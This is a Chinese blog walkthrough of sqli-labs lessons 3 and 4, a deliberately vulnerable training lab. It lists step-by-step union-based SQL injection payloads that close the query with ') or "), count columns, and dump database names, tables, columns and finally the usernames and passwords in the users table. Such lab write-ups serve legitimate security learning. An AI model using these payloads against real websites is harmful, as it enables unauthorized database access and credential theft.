sqli-labs注入lesson3-4闯关秘籍
2024-09-01 18:53:02
·lesson 3
与第一二关不同的是,这一关是基于错误的get单引号变形字符型注入
要使用 ') 进行闭合 (ps:博主自己理解为字符型注入,是不过是需要加括号进行闭合,适用于博主自己的方便记忆的法子,仅供参考 )
1.判断是否存在注入
?id=') --+
2.使用order by 猜测字段数
?id=') order by 3 --+
?id=') order by 4 --+
3.确定显示的字段显示位
?id=') and 1=2 union select 1,2,3 --+
4.爆破数据库的版本和数据库名
?id=') and 1=2 union select 1,version(),database() --+
5.查看所有数据库
?id=') and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
6.根据数据库名,爆破出该数据库中的所有表名
?id=') and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
7.爆破users表中的列名
?id=') and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
8.爆破用户名和密码
?id=') and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+
·lesson 4
这一关跟第三关有所不同,是基于错误的get双引号变形字符型注入
下面博主就直接写出了爆破用户名密码的语句:
?id=") and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+
最新文章
- 下载旧版本的NDK
- Linux下的文件与目录操作 BY 四喜三顺
- GoodReader跨域访问HT for Web手册
- 打开Windows10网络发现或是文件打印共享
- Speex for Android
- 开发中,如何配合后端,保存你的静态html页
- 介绍 JSON
- Date时间对象方法
- mvc 目录不存在/Directory does not exist.的解决方案
- Akka(43): Http:SSE-Server Sent Event - 服务端主推消息
- iterm2 快捷键大全
- 第6次结对作业--郑锦伟&;古维城
- web.xml配置web中的key points(下)
- CentOS YUM 安装 TOMCAT6
- TCP粘包, UDP丢包, nagle算法
- 在线学习和在线凸优化(online learning and online convex optimization)—FTRL算法6
- maven tomcat plugin 踩坑记
- 使用Fiddler模拟客户端http响应【转】
- [转载] MySQL 注入攻击与防御
- [转]:What happens to older developers?